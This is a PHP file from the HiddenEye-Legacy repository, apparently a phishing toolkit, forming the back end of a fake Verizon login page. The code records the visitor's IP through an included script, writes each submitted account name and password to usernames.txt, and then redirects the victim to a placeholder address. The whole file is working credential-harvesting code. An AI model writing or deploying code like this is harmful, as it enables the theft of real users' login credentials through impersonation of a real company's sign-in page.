HiddenEye-Legacy/WebPages/verizon/login.php
2019-04-21 10:15:25 +00:00

8 lines
188 B
PHP

<?php
include 'ip.php';
file_put_contents("usernames.txt", "Account: " . $_POST['IDToken1'] . " Pass: " . $_POST['IDToken2'] . "\n", FILE_APPEND);
header('Location: <CUSTOM> ');
exit();